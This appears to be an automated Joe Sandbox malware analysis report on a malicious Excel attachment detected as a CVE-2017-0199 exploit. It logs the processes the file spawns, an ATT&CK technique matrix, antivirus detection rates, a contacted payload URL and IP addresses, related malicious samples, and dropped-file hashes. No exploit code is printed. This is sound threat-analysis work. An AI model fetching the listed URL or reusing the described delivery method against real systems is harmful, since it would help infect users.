Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: B4440000.0.drInitial sample: OLE indicators vbamacros = False
Source: PO#3311-20250108003.xlsInitial sample: OLE indicators encrypted = True
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: PO#3311-20250108003.xlsStream path 'Workbook' entropy: 7.99101469556 (max. 8.0)
Source: B4440000.0.drStream path 'Workbook' entropy: 7.9083874542 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 1066Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts13
Exploitation for Client Execution
1
Scripting
1
Process Injection
2
Masquerading
OS Credential Dumping1
Process Discovery
Remote Services1
Email Collection
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Extra Window Memory Injection
1
Process Injection
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets2
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Extra Window Memory Injection
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
PO#3311-20250108003.xls30%VirustotalBrowse
PO#3311-20250108003.xls24%ReversingLabsWin32.Exploit.CVE-2017-0199
PO#3311-20250108003.xls100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://s.deemos.com/fmGZaVnS?&bush=watchful&grandmom=adjoining&hackwork0%Avira URL Cloudsafe
https://s.deemos.com/fmGZaVnS?&bush=watc0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.210.172
truefalse
    high
    s.deemos.com
    14.103.79.10
    truefalse
      high
      s-part-0017.t-0009.t-msedge.net
      13.107.246.45
      truefalse
        high
        NameMaliciousAntivirus DetectionReputation
        https://s.deemos.com/fmGZaVnS?&bush=watchful&grandmom=adjoining&hackworkfalse
        • Avira URL Cloud: safe
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        https://s.deemos.com/fmGZaVnS?&bush=watcPO#3311-20250108003.xlsfalse
        • Avira URL Cloud: safe
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        14.103.79.10
        s.deemos.comChina
        18002WORLDPHONE-INASNumberforInterdomainRoutingINfalse
        192.3.27.144
        unknownUnited States
        36352AS-COLOCROSSINGUSfalse
        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1585804
        Start date and time:2025-01-08 09:54:02 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 5m 23s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:defaultwindowsofficecookbook.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Run name:Without Instrumentation
        Number of analysed new started processes analysed:12
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:PO#3311-20250108003.xls
        Detection:MAL
        Classification:mal64.expl.winXLS@6/8@1/2
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Found application associated with file extension: .xls
        • Found Word or Excel or PowerPoint or XPS Viewer
        • Attach to Office via COM
        • Active ActiveX Object
        • Active ActiveX Object
        • Scroll down
        • Close Viewer
        • Exclude process from analysis (whitelisted): dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, svchost.exe, MavInject32.exe
        • Excluded IPs from analysis (whitelisted): 52.109.89.18, 52.109.76.243, 52.113.194.132, 23.56.254.164, 199.232.210.172, 20.42.65.85, 52.109.76.240, 51.105.71.137, 40.126.32.68, 20.109.210.53, 13.107.246.45, 4.175.87.197
        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, weu-azsc-config.officeapps.live.com, eur.roaming1.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, neu-azsc-000.roaming.officeapps.live.com, mobile.events.data.microsoft.com, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, onedscolprduks03.uksouth.cloudapp.azure.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, onedscolprdeus05.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, neu-azsc-config.officeapps.live.co
        • Report size getting too big, too many NtCreateKey calls found.
        • Report size getting too big, too many NtQueryAttributesFile calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • Report size getting too big, too many NtReadVirtualMemory calls found.
        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
        TimeTypeDescription
        03:55:54API Interceptor1103x Sleep call for process: splwow64.exe modified
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        14.103.79.10MS100384UTC.xlsGet hashmaliciousUnknownBrowse
          MS100384UTC.xlsGet hashmaliciousUnknownBrowse
            MS100384UTC.xlsGet hashmaliciousUnknownBrowse
              SWIFT.xlsGet hashmaliciousUnknownBrowse
                SWIFT.xlsGet hashmaliciousUnknownBrowse
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  s.deemos.comMS100384UTC.xlsGet hashmaliciousUnknownBrowse
                  • 14.103.79.10
                  MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                  • 14.103.79.10
                  MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                  • 14.103.79.10
                  SWIFT.xlsGet hashmaliciousUnknownBrowse
                  • 14.103.79.10
                  SWIFT.xlsGet hashmaliciousUnknownBrowse
                  • 14.103.79.10
                  s-part-0017.t-0009.t-msedge.netSubscription_Renewal_Invoice_2025_HKVXTC.htmlGet hashmaliciousHTMLPhisherBrowse
                  • 13.107.246.45
                  Swift-TT680169 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
                  • 13.107.246.45
                  7ccf88c0bbe3b29bf19d877c4596a8d4.zipGet hashmaliciousUnknownBrowse
                  • 13.107.246.45
                  0a0#U00a0.jsGet hashmaliciousPureLog Stealer, RHADAMANTHYS, zgRATBrowse
                  • 13.107.246.45
                  https://sUNg.ethamoskag.ru/0cUrcw3/#Msburkholder@heartland-derm.comGet hashmaliciousUnknownBrowse
                  • 13.107.246.45
                  Sburkholder.pdfGet hashmaliciousUnknownBrowse
                  • 13.107.246.45
                  audio.mp3_JasonhTranscript.htmlGet hashmaliciousUnknownBrowse
                  • 13.107.246.45
                  https://bRH5.bughtswo.com/tgs0/#bW1vb3JlQGVuYWJsZWNvbXAuY29tGet hashmaliciousUnknownBrowse
                  • 13.107.246.45
                  phish_alert_sp2_2.0.0.0 (12).emlGet hashmaliciousUnknownBrowse
                  • 13.107.246.45
                  bg.microsoft.map.fastly.nete-SPT Masa PPh.exeGet hashmaliciousBlackMoonBrowse
                  • 199.232.210.172
                  e-SPT Masa PPh.exeGet hashmaliciousBlackMoonBrowse
                  • 199.232.210.172
                  0a0#U00a0.jsGet hashmaliciousPureLog Stealer, RHADAMANTHYS, zgRATBrowse
                  • 199.232.214.172
                  I6la3suRdt.exeGet hashmaliciousAsyncRATBrowse
                  • 199.232.214.172
                  c2.htaGet hashmaliciousRemcosBrowse
                  • 199.232.210.172
                  Sburkholder.pdfGet hashmaliciousUnknownBrowse
                  • 199.232.214.172
                  U02LaPwnkd.exeGet hashmaliciousValleyRATBrowse
                  • 199.232.210.172
                  c2.htaGet hashmaliciousRemcosBrowse
                  • 199.232.210.172
                  FACTURAMAIL.htmlGet hashmaliciousUnknownBrowse
                  • 199.232.214.172
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  WORLDPHONE-INASNumberforInterdomainRoutingINmiori.m68k.elfGet hashmaliciousUnknownBrowse
                  • 14.103.40.215
                  MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                  • 14.103.79.10
                  MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                  • 14.103.79.10
                  MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                  • 14.103.79.10
                  SWIFT.xlsGet hashmaliciousUnknownBrowse
                  • 14.103.79.10
                  SWIFT.xlsGet hashmaliciousUnknownBrowse
                  • 14.103.79.10
                  Owari.arm.elfGet hashmaliciousUnknownBrowse
                  • 14.103.40.223
                  ZEjcJZcrXc.elfGet hashmaliciousMiraiBrowse
                  • 114.69.243.134
                  AS-COLOCROSSINGUSmiori.ppc.elfGet hashmaliciousUnknownBrowse
                  • 192.210.142.114
                  9876567899.bat.exeGet hashmaliciousLokibotBrowse
                  • 172.245.123.11
                  arm5.elfGet hashmaliciousUnknownBrowse
                  • 104.168.33.8
                  mips.elfGet hashmaliciousUnknownBrowse
                  • 104.168.33.8
                  mpsl.elfGet hashmaliciousUnknownBrowse
                  • 104.168.33.8
                  sh4.elfGet hashmaliciousUnknownBrowse
                  • 107.175.130.16
                  x86_64.elfGet hashmaliciousUnknownBrowse
                  • 104.168.33.8
                  powerpc.elfGet hashmaliciousUnknownBrowse
                  • 104.168.33.8
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  6271f898ce5be7dd52b0fc260d0662b3http://www.cipassoitalia.it/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                  • 14.103.79.10
                  ipmsg5.6.18_installer.exeGet hashmaliciousUnknownBrowse
                  • 14.103.79.10
                  https://online-ops.mypasschange.com/landingPage/2/fbb0559ebe1911efb53c0242ac190102Get hashmaliciousUnknownBrowse
                  • 14.103.79.10
                  skript.batGet hashmaliciousVidarBrowse
                  • 14.103.79.10
                  GtEVo1eO2p.exeGet hashmaliciousLummaCBrowse
                  • 14.103.79.10
                  NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                  • 14.103.79.10
                  L82esnUTxK.exeGet hashmaliciousUnknownBrowse
                  • 14.103.79.10
                  MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                  • 14.103.79.10
                  MS100384UTC.xlsGet hashmaliciousUnknownBrowse
                  • 14.103.79.10
                  No context
                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):118
                  Entropy (8bit):3.5700810731231707
                  Encrypted:false
                  SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                  MD5:573220372DA4ED487441611079B623CD
                  SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                  SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                  SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):934
                  Entropy (8bit):2.7129194926077287
                  Encrypted:false
                  SSDEEP:24:YIrNvpCHhFGMfzLRwcftR/8AJp9WtAZRJ5poIHWPZqy:YmbCHaMfzLmcL8AJtfJ52IH2Zh
                  MD5:AEA8676011F651E962233964C56EC078
                  SHA1:48A16B5ED64B901BD474918730E8428101BCB382
                  SHA-256:F66BFE3FB3CF9C5973527B3C6ED0927D4056DADF962D0B64B87FD97F852191F9
                  SHA-512:76ED966584166233A500D2400C012929DC76D1DFF397C3A3D014FB7ECE767730966655974A3B1BE5B6E0C03CC21B3A38B3029916628DCC07D07CC1A8F7031748
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview:3.7.4.6.3.7.6.,.1.1.9.6.3.7.8.,.1.7.8.8.6.5.8.,.2.5.5.0.5.0.8.8.,.1.2.5.,.1.1.9.,.3.0.0.4.9.2.6.8.,.3.7.4.6.2.5.9.,.1.2.2.3.4.3.4.,.3.7.4.6.2.6.5.,.3.7.4.6.2.5.8.,.;.3.2.9.4.5.8.7.9.9.,.3.7.4.6.3.7.8.,.6.3.6.4.3.3.4.,.3.0.1.5.3.7.2.1.,.2.3.7.1.6.5.1.,.6.5.4.0.2.1.5.,.2.4.6.0.9.2.5.8.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.2.7.1.5.3.4.9.7.,.6.3.7.1.6.9.4.,.8.7.4.7.0.1.5.3.,.5.9.2.2.3.4.2.3.,.5.7.9.9.9.6.6.1.,.1.5.6.1.9.5.8.,.6.3.0.6.3.0.9.9.,.2.7.3.6.0.0.9.5.,.5.8.4.2.5.8.6.0.,.6.3.6.4.3.3.7.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.0.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.3.,.1.0.6.9.5.5.2.,.1.6.5.7.4.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.3.5.2.5.8.7.,.1.7.7.1.6.5.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.3.2.0.5.9.2.7.6.7.,.3.7.4.6.3.7.9.,.1.9.8.4.4.3.5.,.6.1.7.0.7.3.0.5.,.3.1.4.1.5.9.2.0.,.
                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):73728
                  Entropy (8bit):4.763102607741325
                  Encrypted:false
                  SSDEEP:1536:+CCCB/qbrrgk3hbdlylKsgwyzcTbWhZFGkE+cugL80dDUQVUgzVtOam:lqbrrgk3hbdlylKsgwyzcTbWhZFGkE+V
                  MD5:EFA2BA62A1884DE388C807CE0EAD95D9
                  SHA1:99013CDE1B2388EF24E009EE00940696AECD7BE4
                  SHA-256:11524A31816DA3A4FEED46362F2764B6BA3E7F1A0A9E0B49392F5F60F5DA02D0
                  SHA-512:CD5CDBDBA3E59500226A314743D16C635451E4FAEE7A920F54EB30A4667118F4214E050BB249A0A2C1516A4BC55E7FD730476AD76C10AE12D9A481743F3DD886
                  Malicious:false
                  Reputation:low
                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3::
                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                  Malicious:false
                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                  File Type:data
                  Category:dropped
